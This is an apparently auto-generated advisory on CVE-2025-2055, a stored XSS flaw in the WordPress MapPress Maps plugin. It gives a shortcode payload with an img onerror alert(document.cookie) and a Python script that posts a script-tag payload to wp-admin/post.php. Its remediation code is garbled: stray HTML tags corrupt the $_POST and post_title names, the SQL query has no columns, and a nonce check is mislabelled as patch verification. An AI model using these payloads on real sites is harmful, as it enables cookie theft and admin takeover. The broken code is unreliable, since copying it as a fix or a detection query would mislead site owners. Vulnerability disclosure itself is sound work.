How CVE-2025-2055 Works
The MapPress Maps plugin (before v2.94.9) fails to sanitize user-supplied input when rendering map parameters on WordPress pages. Contributors or higher can inject malicious JavaScript payloads through unsanitized parameters. When administrators view pages containing the tainted maps, the script executes in their session context, potentially leading to privilege escalation, cookie theft, or admin takeover. The vulnerability stems from improper output encoding in the frontend rendering function that processes shortcode attributes.
DailyCVE Form
Platform: WordPress
Version: <2.94.9
Vulnerability: Stored XSS
Severity: Medium
date: 04/03/2025
What Undercode Say:
// Proof-of-Concept XSS payload for MapPress [mappress mapid="1" html='<img src=x onerror=alert(document.cookie)>']
Check vulnerable versions wp plugin list --field=version | grep mappress
// Patch verification
if (!wp_verify_nonce($<em>POST['mappress_params'], 'mappress_nonce')) {
die('Invalid request');
}
Temporary mitigation
location ~ /wp-content/plugins/mappress/ {
deny all;
}
Database query to find infected posts SELECT FROM wp_posts WHERE post_content LIKE '%[mappress %html=%]%';
Exploit simulation
import requests
wordpress_site = "http://vulnerable-site.com"
payload = {
'post</em>': 'XSS Test',
'post_content': '[mappress html="<script>alert(1)</script>"]',
'post_status': 'pending'
}
requests.post(f"{wordpress_site}/wp-admin/post.php", data=payload)
.htaccess protection: <FilesMatch "mappress\.php$"> Require all denied </FilesMatch>
// Client-side protection
document.addEventListener('DOMContentLoaded', function() {
if (window.mappress) {
Object.freeze(window.mappress.render);
}
});
Automated patching wp plugin update mappress --version=2.94.9
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
